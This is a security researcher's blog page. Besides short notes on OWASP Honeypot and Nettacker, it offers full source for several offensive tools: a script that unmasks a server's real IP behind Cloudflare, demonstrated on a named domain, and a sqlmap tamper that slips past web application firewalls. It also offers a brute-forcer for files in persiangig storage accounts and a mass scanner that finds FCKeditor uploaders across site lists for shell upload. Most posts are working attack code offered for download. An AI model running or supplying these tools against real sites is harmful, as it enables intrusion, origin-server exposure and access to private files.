API: http://ohp-stockholm-live.z3r0d4y.com:5000/ API Docs: https://github.com/zdresearch/OWASP-Honeypot/wiki … …
Senior Security Researcher · Cybersecurity Specialist · Application Security Engineer · DevSecOps · Software Engineer
2019-04-12
OWASP Honeypot
In our first test of the OWASP Honeypot with Ali Razmjoo, I am gonna say that among all attacks we are receiving, Russians are doing it smarter and more effective
API: http://ohp-stockholm-live.z3r0d4y.com:5000/ API Docs: https://github.com/zdresearch/OWASP-Honeypot/wiki … …
API: http://ohp-stockholm-live.z3r0d4y.com:5000/ API Docs: https://github.com/zdresearch/OWASP-Honeypot/wiki … …
Black Hat Asia 2019
Our OWASP Nettacker: Automated Penetration Testing Framework has been accepted for Black Hat Asia Arsenal 2019.
The OWASP Nettacker project was created to automate information gathering, vulnerability scanning, and eventually generating a report for networks, including services, bugs, vulnerabilities, misconfigurations, and other information. This software will utilize TCP SYN, ACK, ICMP and many other protocols in order to detect and bypass Firewall/IDS/IPS devices. By leveraging a unique method in OWASP Nettacker for discovering protected services and devices such as SCADA, it would make a competitive edge compared to other scanners, making it one of the best.
https://www.blackhat.com/asia-19/arsenal/schedule/index.html#owasp-nettacker-automated-penetration-testing-framework-14336
The Black Hat photographer has uploaded some pictures to Flickr; you can check them out, here: https://www.flickr.com/photos/ blackhatevents/albums/ 72157707843897024
2018-11-10
Bypass Cloudflare To Get Real IP Address
What is CloudFlare
CloudFlare is one of the fastest growing CDN providers, which has free and premium service to accelerate, optimize & secure websites. There are more than 2,000,000 web properties powered by CloudFlare and I use their service too. If you are already using CloudFlare then you might have noticed IP address in DNS lookup get reflected with CloudFlare.
How this script works
this script is designed to discover the origin IP of a server that is behind Cloudflare,The work method of this script is to scan the NS of a domain,This tool only works to domains that are the domains of the original NS server This tool scans the default Private Name Server, and if they exist, they will find the original server IP
Example NS
ns1,"ns2","ns3","ns4","primary","host1","host2","masterdns","slavedns" "dns1","dns2","master","slave","node1","node2" |
Ping Test
With a ping of the domain, the Cloudflare fake IP is displayed :
C:\Users\root>ping cafeigapp.com Pinging cafeigapp.com [172.64.197.10] with 32 bytes of data: Reply from 172.64.197.10: bytes=32 time=153ms TTL=60 Reply from 172.64.197.10: bytes=32 time=150ms TTL=60 Reply from 172.64.197.10: bytes=32 time=149ms TTL=60 Reply from 172.64.197.10: bytes=32 time=155ms TTL=60 Ping statistics for 172.64.197.10: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 149ms, Maximum = 155ms, Average = 151ms |
CloudFlare Bypasser script result The script has detected the original IP by scanning Name Server on port 80 and 53, real IP is 144.76.174.208
Enter your domain: cafeigapp.com Starting... [+] Open ns1.cafeigapp.com 53 144.76.174.208 [+] Open ns1.cafeigapp.com 80 144.76.174.208 [+] Open ns2.cafeigapp.com 53 144.76.174.208 [+] Open ns2.cafeigapp.com 80 144.76.174.208 [-] Hostname could not be resolved. [-] Hostname could not be resolved. [-] Hostname could not be resolved. [-] Hostname could not be resolved. [*] Finished! |
Cloudflare Bypasser Script:
Download script
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 | ''' File name: Bypass Cloudflare To Get Real IP Address Author: Dariush Nasirpour (Net.Edit0r) Date created: 11/10/2018 Web: http://nasirpour.info Spicial Thanks to Ehsan Nezami ''' import socket socket.setdefaulttimeout(1) domain = raw_input("Enter your domain: ") try: print "Starting...\n\r" dns = ["ns1.", "ns2.", "ns3.", "ns4.", "primary.", "host1.", "host2.", "masterdns.", "slavedns.", "dns1.", "dns2.", "master.", "slave.", "node1.", "node2."] for dns_name in dns: remoteServerIP = dns_name + domain for port in [53, 80]: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) IP = socket.gethostbyname(remoteServerIP) result = sock.connect_ex((remoteServerIP, port)) if result == 0: print "[+] Open\t{:<50}{:<3}\t{}".format(remoteServerIP, port, IP) sock.close() except socket.gaierror: print "[-] Hostname could not be resolved." pass except socket.error: print "[-] Couldn't connect to server" pass print "\n[*] Finished!" except KeyboardInterrupt: print "You pressed Ctrl+C" pass |
2018-11-09
PHP Decoder "Encoding by TeleAgent.IR - ResellerCenter.IR"
This script will help you to decode files coded as "Encoding by TeleAgent.IR - ResellerCenter.IR".
For more detailed look here :
Download script
To execute this script, just execute it and give it your path.
Enjoy.
For more detailed look here :
<?php //MS4w /* --------------------------------------------------------------------------------- - PHP Encoding by TeleAgent.IR - ResellerCenter.IR - - PHP Encoder Version : 1.0 - - This code was created on : 2018/10/01 at 13:00 - - Checksum : 6fj65a682a445d8cb5734720ed67dae2 - ---------------------------------------------------------------------------------- */ $_CLHHKEE=__FILE__;$_NQRSZPKB=__LINE__;$_CHDAOJMPYXT=__DIR__ ;$_FNMHVDO=__FUNCTION__; function I1IIIIIII11I1II() {return __CLASS__;}function I1IIIIIII() {return __LINE__;} $_CSYPWGZ=__CLASS__;$_TTBLNSD=__TRAIT__ ;$_MDGRSQS=__METHOD__ ;$_NEVYW=__NAMESPACE__; function I1IIIIIII1II() {return __FUNCTION__;}function I1I1IIII() {return __TRAIT__;} function I1IIIIIII11I11II() {return __FILE__;}function I1III1IIII() {return __DIR__;} function I1III11I1I() {return __METHOD__;}function I1II1III() {return __NAMESPACE__;} $_QXXCZD="\142\141\163\x65\x36\64\137\144\145\x63\157\x64\145";@echo("?>".$_QXXCZD("PD9waHAgJF9.
Download script
To execute this script, just execute it and give it your path.
Enjoy.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 | ''' File name: PHP Decoder "Encoding by TeleAgent.IR - ResellerCenter.IR".py Author: Ehsan Nezami Date created: 19/11/2018 Web: http://nezami.me/ Python Version: 2.7 ''' import os import re import base64 import zlib def listFiles(path, extension): return [f for f in os.listdir(path) if f.endswith(extension)] path_name = raw_input("What is your path of php files? \n Example : C:\\files\\ \n ") for files in listFiles(path_name, '.php'): print files start = '$_QXXCZD("' end = '"));' f=open(files,'r') for input in f.readlines(): data= re.findall(re.escape(start)+"(.*)"+re.escape(end),input) for x in data: x=base64.b64decode(x) start1 = '.$_ZUI("' end1 = '"));' data1= re.findall(re.escape(start1)+"(.*)"+re.escape(end1),x) for x1 in data1: x1=base64.b64decode(x1) start2 = '$_IRRGRHMF("' end2 = '"));' data2= re.findall(re.escape(start2)+"(.*)"+re.escape(end2),x1) for x2 in data2: x2=base64.b64decode(x2) start3 = '$_EFTYPYA("' end3 = '"));' data3= re.findall(re.escape(start3)+"(.*)"+re.escape(end3),x2) for x3 in data3: x3=base64.b64decode(x3) start4 = '$_AOKDOJCRH("' end4 = '"));' data4= re.findall(re.escape(start4)+"(.*)"+re.escape(end4),x3) for x4 in data4: x4=base64.b64decode(x4) start5 = '$_NZHLDCOUMASYWHUKYETFVEDDJELK("' end5 = '")));' data5= re.findall(re.escape(start5)+"(.*)"+re.escape(end5),x4) for x5 in data5: compressed = base64.b64decode(x5) decoded=zlib.decompress(compressed, -15) print decoded output=file('dec-'+files,'a') output.write(decoded) |
2018-11-08
Random Session (Sqlmap Tamper)
SQLMAP is Automatic SQL injection and database takeover tool.
this tamper can use to bypass some web application firewall via the random session.
Download script
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | #!/usr/bin/env python """ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission author: 3H34N(nezami.me) """ import string import random from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL def dependencies(): pass def randomsession(): length = 32 chars = string.ascii_letters.lower() + string.digits password = ''.join(random.choice(chars) for i in range(length)) return "PHPSESSID="+password def tamper(payload, **kwargs): """ Append a random session HTTP header 'PHPSESSID' to bypass WAF (usually application based) protection """ headers = kwargs.get("headers", {}) headers["Cookie"] = randomsession() return payload |
2015-11-30
Persiangig File Finder
This script helps you to brute force files and directories on persiangig storage accounts.
if you would like for more performance you can edit or change dictionaries list by yourself.
Note : Read Usage.
Enjoy!
Click Here To Download
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 | import urllib2 import curses import sys import os def get_param(prompt_string): """Brings up new screen asking user to enter a single parameter. Args: prompt_string: Prompt which asks/tells user what to enter (string). """ screen.clear() screen.border(0) screen.addstr(2, 2, prompt_string) screen.refresh() input = screen.getstr(10, 10, 60) return input def file(types,session,username): print "\n" f=open('list.txt','r') print "Starting...\n" for dic in f: #print dic try: req = urllib2.Request('http://%s.persiangig.com/%s%s/download?%s'%(str(username),(dic).rsplit()[0],str(types),str(session))) response = urllib2.urlopen(req) the_page = response.read() if "pg100.png" not in the_page: if "۰ b" not in the_page: print "File ["+dic.rsplit()[0]+types+"] Found !" ff=open('success.txt','a') ff.write(dic.rsplit()[0]+types+'\n') ff.close() else: print '[',dic.rsplit()[0],'] Session expired' session=raw_input("session: ").rsplit()[0] except: print "err url" def dir(username): print "\n" f=open('list.txt','r') print "Starting...\n" for dic in f: #print dic try: req = urllib2.Request('http://%s.persiangig.com/%s'%(str(username),(dic).rsplit()[0])) response = urllib2.urlopen(req) the_page = response.read() if "pg100.png" not in the_page: print "Directory ["+dic.rsplit()[0]+"] Found !" ff=open('success-dir.txt','a') ff.write(dic.rsplit()[0]+'\n') ff.close() except: print "err url" def info(): os.system('cls') print "Persiangig file and directory finder trough the list!" print "\n\t" print "you have URL like : \nhttp://hacker.persiangig.com/file.rar/download?010d\n\n" print "value will be :\nhttp://[username].persiangig.com/[file type]/download?[session]" print "\n\t\t\t\t\t\n" x = 0 while x != ord('4'): screen = curses.initscr() curses.start_color() # Must call this before creating pairs. # Create hardcoded color pairs (foreground/background) to use: #curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK) #curses.init_pair(2, curses.COLOR_BLUE, curses.COLOR_WHITE) #curses.init_pair(3, curses.COLOR_RED, curses.COLOR_BLACK) screen.clear() screen.border(0) screen.addstr(screen.getmaxyx()[0]-1,1,"Copyright ITSecZone co. (http://www.nezami.info)") screen.addstr(2, 2, "Please enter a number...") screen.addstr(4, 4, "1 - Directory Finder") screen.addstr(5, 4, "2 - File Finder") screen.addstr(6, 4, "3 - Usage") screen.addstr(7, 4, "4 - Exit") screen.refresh() x = screen.getch() if x == ord('1'): try: username = get_param('Enter your username of persiangig: ').rsplit()[0] except: sys.exit("err user input!") curses.endwin() dir(username) raw_input('Press enter (to return to main)') if x == ord('2'): try: types = get_param('Enter your types of file name:\n Example : .rar or .zip ... ').rsplit()[0] session = get_param('Enter your session name:\n Session must be in 4 digit end of url ').rsplit()[0] username = get_param('Enter your username:\nUsername of persiangig. ').rsplit()[0] except: sys.exit("err user input!") curses.endwin() file(types,session,username) raw_input('Press enter (to return to main)') if x == ord('3'): curses.endwin() info() raw_input('Press enter (to return to main)') curses.endwin() |
2015-11-21
International CTF We ranked 11
Hack Dat Kiwi (Kiwi CTF)
Hack Dat Kiwi is a new CTF franchise designed by security researchers and hackers with the aim of creating quality challenges that the participants enjoy solving. We do not put puzzles in our CTFs, and the challenges are designed for those who really know what they are doing, and not tool junkies.
Cash prize for overall winners and category winners.
Crypto/Forensics, RE/Exploit, Web, Forensics, Experimental.
Country-based hacker rankings will be available after the CTF on brag.dat.kiwi! It will stay online and preserve your right to brag.
our team ranked 11
2015-08-04
PHP Law Decoding!
Decode PHP code with signature : [protected by law]
I wrote an script for reverse it.
I wrote an script for reverse it.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 | <style type="text/css"> *{ background-color: #F7F3E8; border: 2px solid #e3e3e3; border-radius: 8px 8px 8px 8px; margin-bottom: 5px; padding: 5px; } TD{font-family: Tahoma; font-size: 10pt;} input,select,textarea{ border:0; border:1px solid #900; color:#fff; background:#000; margin:0; padding:2px 4px; } input:hover,textarea:hover,select:hover{ background:#200; border:1px solid #f00; } .red{ color:#f00; } .white{ color:#fff; } a{ text-decoration:none; } a:hover{ border-bottom:1px solid #900; border-top:1px solid #900; } #result a{ color:#777; } .sign{ color:#222; } #box{ margin:10px 0 0 0; } </style> <html> <body> <center><br> <title>PHP Law DECODER BY #BHG[3H34N]</title> <font size='3' color='#bbbbbb'>PHP Law DECODER BY #BHG[3H34N]</font><br><br> <font size='3' color='#bbbbbb'>WebSite:<b><a href="http://nezami.info">nezami.info</a></b><br/></font><br/> <font size='2' color='#bbbbbb'>Email:<font size='2' color='red'>me@nezami.info</font></font></br><br/> <font size='3' color='#bbbbbb'> Example:<font size='2' color='green'>/* WARNING: This file is protected by copyright law. To reverse engineer or decode this file is strictly prohibited. */ </font></font><br><br> <font size='3' color='#bbbbbb'>$o=<font size='2' color='green'><U>Copy This Part Of Your Code To Text Box & Press DeCode</U>;eval(base64_decode("Li4ud3d3LmJsYWNrLWhnLm9yZyBDb3B5IFJpZ2h0IEZvcjNIMz ROIC4uLi=="));return;?></font></font><br><br> <form name="form" method="post"> <textarea name="text" cols=100 rows=20></textarea> <input type="hidden" name="status" id="status" value="1"> <br/> <div class="submit"><br> <input alt="DeCode" title="Send" alt="Decode" type="image"><br> </div> </form> <?php header('Content-Type: text/html; charset=utf-8'); if (isset($_POST['text']) && isset($_POST['status'])) { $text = get_magic_quotes_gpc() ? stripslashes($_POST['text']) : $_POST['text']; $o="$text"; $lll=0; $lllllllllll='base64_decode'; $ll=0; $llllllllll='ord'; $llll=0; $lllll=3; $l=$lllllllllll($o); $lllllll=0; $llllll=($llllllllll($l[1])<<8)+$llllllllll($l[2]); $lllllllllllll='strlen'; $lllllllll=16; $llllllll=""; for(;$lllll<$lllllllllllll($l);){ if($lllllllll==0){ $llllll=($llllllllll($l[$lllll++])<<8); $llllll+=$llllllllll($l[$lllll++]); $lllllllll=16; } if($llllll&0x8000){ $lll=($llllllllll($l[$lllll++])<<4); $lll+=($llllllllll($l[$lllll])>>4); if($lll){ $ll=($llllllllll($l[$lllll++])&0x0f)+3; for($llll=0;$llll<$ll;$llll++) $llllllll[$lllllll+$llll]=$llllllll[$lllllll-$lll+$llll]; $lllllll+=$ll; } else{ $ll=($llllllllll($l[$lllll++])<<8); $ll+=$llllllllll($l[$lllll++])+16; for($llll=0;$llll<$ll;$llllllll[$lllllll+$llll++]=$llllllllll($l[$lllll])) ; $lllll++; $lllllll+=$ll; } } else $llllllll[$lllllll++]=$llllllllll($l[$lllll++]); $llllll<<=1; $lllllllll--; } $llllllllllll='chr'; $lllll=0; $lllllllll="?".$llllllllllll(62); $llllllllll=""; for(;$lllll<$lllllll;){$llllllllll.=$llllllllllll($llllllll[$lllll++]^0x07);} $lllllllll.=$llllllllll.$llllllllllll(60)."?"; echo 'DECODED: <br/><textarea cols=100 rows=20>'."'$lllllllll';".PHP_EOL.'</textarea><br/>'; } ?> <center> </body> <font size='3' color='#bbbbbb'><b><a href="http://nezami.info">#3H34N</a></b></font> </html> |
FCKeditor finder for upload shell
Most of FCKeditor vulnerable to shell upload from example path in the blow:
via this script, you can find common uploader that is using in [FCKeditors]
I tried to collect all of the paths that are important and most use! and I write this script to find them, even restricted access to them.
Download script
1 2 | http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html |
via this script, you can find common uploader that is using in [FCKeditors]
I tried to collect all of the paths that are important and most use! and I write this script to find them, even restricted access to them.
Download script
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 | import urllib2 import socket import cookielib import sys import re import os socket.setdefaulttimeout(10) if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) if len(sys.argv) <= 1: print "\n|----------------------------------------------|" print "| - FCKeditor Finder - |" print "| Usage: FCKditorFinder.py sites_list.txt |" print "| https://nezami.me |" print "|----------------------------------------------|\n" sys.exit(1) dirs=['fckeditor','FCKeditor','include/fckeditor','includes/fckeditor','admin/fckeditor','fck/fckeditor','fck3ditor/fckeditor','editor/fckeditor','filemanager/fckeditor','plugins/fckeditor','FCKeditor/fckeditor''TVS/FCKeditor','forum/fckeditor','forums/fckeditor','home/fckeditor','shcsAdmin/fckeditor','wspro/html/js/editor/fckeditor/','html/js/editor/fckeditor/','scripts/ajax/FCKeditor/','CFIDE/scripts/ajax/FCKeditor/','CMSAdminControls/FCKeditor/','mambots/editors/fckeditor/','webspace/html/js/editor/fckeditor/','resources/fckeditor/','jphoto/fckeditor/','sysadmin/utils/FCKeditor/','templates/fckeditor/','fcnews/fckeditor/','js/fckeditor/','/sites/all/modules/fckeditor/','admin/classes/components/formattedTextArea/fckeditor/','admin/panel/fckeditor/','cfscripts/ajax/FCKeditor/','ECP/fsboard/fckeditor/','sadmin/FCKeditor/','index/class/xoopseditor/fckeditor/','arti/outils/fckeditor/','Common/Scripts/fckeditor','jmcmurra/generators/inc/fckeditor','admin/view/javascript/fckeditor','editors/FCKeditor/','ModernDeckDepot/fckeditor','otkup_test/fckeditor/','shop/assets/js/fckeditor/','webshop//portal/templates/fckeditor/','new/aset/js/fckeditor/','siebenkorn/script/FCKeditor','assetmanager/HTMLEditor/''portal/handlers/tiny_mce/','fa/handlers/tiny_mce/','handlers/tiny_mce/','plugins/tiny_mce/','zp-core/plugins/tiny_mce/','wp-content/plugins/asset-manager/','plugins/asset-manager/'] try: f=open(sys.argv[1],'r') for line in f.readlines(): line = line.rstrip() for subdir in dirs: site="%s/%s" %(line,subdir) print site hdr = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language': 'en-US,en;q=0.5','Accept-Encoding': 'gzip, deflate','Connection': 'keep-alive'} req = urllib2.Request(site, headers=hdr) guery=['403 - Forbidden: Access is denied.','Directory Listing Denied', 'Parent Directory','Forbidden','Index of /','Directory Listing For'] try: page=urllib2.urlopen(req) content= page.fp.read() for eMSG in guery: if re.search(eMSG,content): print "OK >>>"+site f=open("fckeditor.txt","a") f.write(site+"\n") except urllib2.HTTPError, e: page=e.fp.read() for eMSG in guery: if re.search(eMSG, page): print "OK >>>"+site f=open("fckeditor.txt","a") f.write(site+"\n") except urllib2.URLError: print "Time Out\nTry To Another..." except ValueError: print "Please Input valid URL" except socket.timeout: print "Time Out" except IOError: print "Please Input Correct File Name" sys.exit(1) except KeyboardInterrupt: print "You pressed Ctrl+C" pass |
Subscribe to:
Posts (Atom)